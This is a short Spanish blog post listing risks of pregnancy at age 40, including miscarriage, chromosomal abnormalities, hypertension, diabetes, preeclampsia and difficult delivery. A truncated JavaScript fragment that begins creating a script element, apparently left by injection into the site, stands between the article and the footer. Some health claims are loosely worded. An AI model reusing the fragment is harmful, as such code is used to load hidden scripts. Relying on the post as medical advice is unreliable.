Salud y belleza » Embarazo, Salud

Riesgos de un embarazo a los 40

Sin Comentarios

Quedarse embarazada con 40 años puede tener algunos beneficios tales como la estabilidad económica o la madurez emocional, pero en cuestiones de salud es bastante peligroso y puede tener algunos riesgos. Hoy vamos a hablarte de los riesgos de quedarse embarazada a los 40.

embarazo-a-los-40

- La infertilidad es uno de los mayores problemas ya que a esa edad es más normal sufrir abortos espontáneos y problemas para concebir relacionados con la endometriosis y obstrucción de las trompas.

- Anormalidades genéticas: los óvulos pueden tener a esta edad más dificultades para su división, lo que puede generar más problemas como malformaciones o síndrome de Down.

- Los problemas de salud en un embarazo a los 40 son más comunes. Pueden desarrollarse enfermedades como la hipertensión y la diabetes.

- Hay más riesgos de sufrir preeclampsia, una complicación que puede causar hinchazón en articulaciones, daños en el sistema nervioso, derrames cerebrales

embarazo-40-años

- Complicaciones en el parto: suelen durar más y suelen darse complicaciones, lo que incrementa el riesgo de muerte del feto.

¿Tienes en mente quedarte embarazada a los cuarenta?

var d=document;var s=d.createElement('script'); if (document.currentScript) {

Más consejos de salud y belleza : , ,

Publique su Comentario !

Add your comment below, or trackback from your own site. You can also subscribe to these comments via RSS.

Be nice. Keep it clean. Stay on topic. No spam.